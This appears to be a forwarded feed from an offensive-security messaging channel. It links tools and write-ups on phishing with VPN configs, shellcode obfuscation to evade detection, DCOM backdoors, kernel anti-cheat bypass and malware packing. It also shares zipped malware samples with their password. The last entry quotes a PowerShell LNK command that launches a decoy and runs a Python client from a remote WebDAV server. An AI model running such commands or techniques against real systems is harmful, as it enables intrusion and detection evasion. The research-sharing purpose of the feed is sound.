Rogue OpenVPN and WireGuard! 🧭
Still sending docm macros? Reconsider your phishing scripts! Send OpenVPN and WireGuard configurations! You can easily achieve command exec using VPN : )
Examples here:
https://github.com/CICADA8-Research/Penetration.git
Forget PSEXEC: DCOM Upload & Execute Backdoor
https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor
LexiCrypt is a shellcode obfuscation and encoding tool that transforms raw shellcode bytes into a "lexicon" of words derived from file names in the Windows System32 directory. The resulting encoded output can then be embedded into a code template in various programming languages (e.g., C++, Rust, C#, Go, VBScript/WScript). This approach can help disguise shellcode and potentially bypass naive detection mechanisms.
https://github.com/tehstoni/LexiCrypt.git
🔥 Initial Access Guild registration is now open! 🔥
Offensive Engineers, let us unite in a trusted, vetted community!
I invite you to a curated closed Discord server, where ideas can be exchanged safely.
☢️ binary-offensive.com/guild ☢️
See you inside fellow Breacher!
Custom instruction length for Hex-Rays
https://github.com/milankovo/instrlen.git
The Instrlen plugin is a tool for IDA Pro that allows for setting the length of an instruction to a custom value. This can be useful when the code is obfuscated or there are jumps after the instruction prefixes.
CPP / C++ Notes - Windows API Programming Win32
https://caiorss.github.io/C-Cpp-Notes/WindowsAPI-cpp.html#orge9d5c6d
Forwarded from K4YT3X's Channel (K4YT3X)
I have open-sourced a very simple method for bypassing kernel anti-cheat that I found earlier:
https://github.com/k4yt3x/InstantSuspend
Basically, if you suspend the process before the driver starts protecting it, you get a chance to OpenProcess and grab a handle, patch code, and so on. With some anti-cheats, once the process is resumed you still cannot read or write its memory afterwards; with others, once you have the handle you can keep using it.
It really is that simple, so there is no point keeping it hidden.
PhishiUrl
https://github.com/EmadYaY/PhishiUrl
A tool for generating and detecting Unicode domains to identify phishing URLs, aimed at assisting cybersecurity professionals in recognizing and mitigating homograph attacks.
Catalog of key Windows kernel data structures
https://codemachine.com/articles/kernel_structures.html
Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/
Thanks to https://x.com/5mukx
Just an attempt to group extracted data from Defender for research purposes.
https://github.com/HackingLZ/ExtractedDefender
Credits: Justin Elze
Local Admin In Less Than 60 Seconds (Part 1)
https://medium.com/@nickvourd/local-admin-in-less-than-60-seconds-part-1-e2a0c0102b99
Snowy Days & The Malware Packing Ways
https://deluks2006.github.io/posts/snowy-days-and-the-malware-packing-ways/
#packers
Source Byte
I gathered samples related to the Attack Against Iran's State Broadcaster. If you have access to those three missing files, please share them in the group. File password: infected. Credits: vx-underground, MalwareBazaar, Check Point.
Attachment: Iran's State Broadcaster.zip (4.2 MB)
Thanks to "a gh" for sharing the missing files (two Windows event logs).
Password is: infected
Forwarded from Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access
🔗 Link
#redteam
#initial_access
———
🆔 @Infosec_Fortress
https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/
LNK files are so strange: you can literally do anything with them, and yet there is no security log to detect them :(
or even run Python remotely:
-w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"